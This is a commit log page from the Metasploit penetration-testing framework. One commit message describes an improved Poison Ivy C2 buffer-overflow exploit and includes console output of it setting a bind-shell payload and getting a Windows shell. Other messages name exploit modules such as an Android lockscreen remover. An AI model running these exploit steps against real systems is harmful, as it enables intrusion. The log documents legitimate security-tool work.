Commit Graph

35540 Commits (bd2f73f40a3fef6da803e4a361583d879a6c8af6)

Author SHA1 Message Date
wchen-r7 122d57fc20
Land #5945, Add auto-accept to osx/enum_keychain 2015-09-08 10:56:08 -05:00
wchen-r7 13afbc4eae Properly check root for remove_lock_root (android post module)
This uses the Msf::Post::Android::Priv mixin.
2015-09-08 10:40:08 -05:00
joev 1b320bae6a Add auto-accept to osx/enum_keychain. 2015-09-07 21:17:49 -05:00
Manuel Mancera e97056a367 When the port state is open|filtered should be unknown, no open 2015-09-07 22:52:03 +02:00
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
HD Moore ec5cbc842e Cosmetic cleanups 2015-09-05 22:56:11 -05:00
HD Moore 8c0b0ad377 Fix up jailbreak commands & regex for success detection 2015-09-05 22:54:07 -05:00
HD Moore 091c4d5214 Expand and reorder 2015-09-05 22:51:32 -05:00
HD Moore 76d74576db Remove FTP-only default credentials 2015-09-05 22:39:51 -05:00
HD Moore 21b69b9430 Remove HP MPE/iX password defaults 2015-09-05 22:38:30 -05:00
JT 2f8dc7fdab Update w3tw0rk_exec.rb
changed response to res
2015-09-05 14:21:07 +08:00
Brent Cook d7887b59aa
Land #5892, update pcaprub to the latest version 2015-09-04 17:26:29 -05:00
Brent Cook 408edda4de add libpcap-dev to our travis dependencies 2015-09-04 17:24:49 -05:00
Brent Cook a3d212c92b
Land #5933, ensure commands exit with consistent status from -h 2015-09-04 17:07:09 -05:00
jvazquez-r7 23ab702ec4
Land #5631, @blincoln682F048A's module for Endian Firewall Proxy
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1
Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991
Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29
Use static max length 2015-09-04 16:18:55 -05:00
jvazquez-r7 1ebc25092f
Delete some comments 2015-09-04 16:18:15 -05:00
Roberto Soares cc405957db Add some improvements 2015-09-04 16:02:30 -03:00
Roberto Soares 4531d17cab Added the rest of the code 2015-09-04 15:37:42 -03:00
jvazquez-r7 eaf51a2113
Land #5722, @vallejocc's busybox work 2015-09-04 13:36:44 -05:00
jvazquez-r7 5dd0cee36a
Add comment 2015-09-04 13:30:00 -05:00
Roberto Soares b9ba12e42a Added get_token method. 2015-09-04 15:27:28 -03:00
jvicente 2b2dec3531 Fixed typo direcotry. 2015-09-04 18:52:55 +02:00
Vallejocc 4cdbabdde7 Merge pull request #1 from jvazquez-r7/review_5722
Code review and cleanup for Busybox PR
2015-09-04 18:45:53 +02:00
jvazquez-r7 319bc2d750
Use downcase 2015-09-04 11:18:09 -05:00
jvazquez-r7 05e1a69fe5
Add specs for prepend 2015-09-04 11:14:53 -05:00
jvazquez-r7 da221b82a8
Initialize dir 2015-09-04 11:07:49 -05:00
William Vu a802317f84 Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
Roberto Soares 6f4f8e34b4 Added method bolt_login. 2015-09-04 10:45:15 -03:00
Roberto Soares a195f5bb9e Initial commit - Skeleton 2015-09-04 04:09:16 -03:00
jvazquez-r7 ef6df5bc26
Use get_target_arch 2015-09-03 16:30:46 -05:00
jvazquez-r7 2588439246
Add references for the win32k info leak 2015-09-03 15:35:41 -05:00
Brent Cook e48bcb4e08
Land #5931, tweak titles 2015-09-03 14:52:52 -05:00
James Lee b2c401696b
Add certutil support.
Tested while landing #5736
2015-09-03 14:24:37 -05:00
James Lee 3d428ef33d
Fix spec like I shoulda done before landing #5736 2015-09-03 14:23:30 -05:00
James Lee 7665747d1c
Land #5736, certutil cmdstager
Ferreal this time.
2015-09-03 14:21:21 -05:00
James Lee 1e6a1f6d05 Revert "Fix spec like I shoulda done before landing #5736"
This reverts commit 956c8e550d.

Conflicts:
	spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
2015-09-03 14:18:55 -05:00
James Lee 82b27c9038 Revert "Land #5736, certutil cmdstager"
This reverts commit 93eb42dfa3.

Conflicts:
	spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
2015-09-03 14:18:28 -05:00
James Lee 956c8e550d
Fix spec like I shoulda done before landing #5736 2015-09-03 13:53:21 -05:00
James Lee 9ccd95af26
Land #5916, fix encoding when badchars contains - 2015-09-03 13:42:45 -05:00
jvazquez-r7 6e857568e0
Delete comments 2015-09-03 13:33:40 -05:00
James Lee b4547711f3
Add certutil support.
Tested while landing #5736
2015-09-03 13:27:10 -05:00
James Lee 93eb42dfa3
Land #5736, certutil cmdstager 2015-09-03 13:13:24 -05:00
jvazquez-r7 697a6cd335
Rescue the process execute 2015-09-03 13:03:36 -05:00
HD Moore f0ef035a0b Update the module titles to clarify what these do 2015-09-03 12:53:25 -05:00
HD Moore 660c31e28b
Land #5413, add remove lockscreen for Android meterpreter 2015-09-03 12:43:05 -05:00
HD Moore 630057e23f Implement suggestions from the PR discussion 2015-09-03 12:42:51 -05:00
HD Moore 57c8038f07 Merge branch 'master' into land-5413 2015-09-03 12:38:19 -05:00